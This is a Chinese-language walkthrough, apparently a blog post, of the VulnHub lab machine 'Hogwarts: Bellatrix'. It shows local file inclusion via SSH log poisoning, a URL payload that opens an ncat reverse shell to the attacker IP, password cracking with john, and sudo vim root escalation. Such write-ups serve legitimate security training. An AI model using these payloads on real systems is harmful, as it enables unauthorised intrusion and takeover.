HOGWARTS: BELLATRIX

靶机地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/

 

攻击机ip:192.168.99.128
靶机地址ip:192.168.99.144

扫描靶机端口,开放了22、80

HOGWARTS: BELLATRIX

访问80端口

HOGWARTS: BELLATRIX

查看网页源代码,有个目录的.php文件存在文件包含

HOGWARTS: BELLATRIX

网页源码有存在一个.php文件,参数是file

HOGWARTS: BELLATRIX

存在文件包含

http://ip/ikilledsiriusblack.php?file=/etc/passwd

HOGWARTS: BELLATRIX

尝试用包含SSH的日志信息

HOGWARTS: BELLATRIX

现在稍微污染一下SSH日志信息

HOGWARTS: BELLATRIX

http://ip/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=id

命令执行

HOGWARTS: BELLATRIX

用命令执行来反弹shell

http://192.168.99.144/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash 192.168.99.128 1234

HOGWARTS: BELLATRIX

在一个隐藏目录下找到一个字典

HOGWARTS: BELLATRIX

还有一个hash

HOGWARTS: BELLATRIX

保存下来,用john进行爆破, 得到密码 ihateharrypotter

HOGWARTS: BELLATRIX

切换用户

HOGWARTS: BELLATRIX

vim可以提权

 HOGWARTS: BELLATRIX

sudo vim
:!/bin/bash

HOGWARTS: BELLATRIX

获取root权限

HOGWARTS: BELLATRIX

 

参考地址:https://www.hackingarticles.in/hogwarts-bellatrix-vulnhub-walkthrough/

HOGWARTS: BELLATRIX

上一篇:Spring+SpringMVC+MyBatis+easyUI整合进阶篇(六)一定要RESTful吗?


下一篇:HTML5如何播放本地文件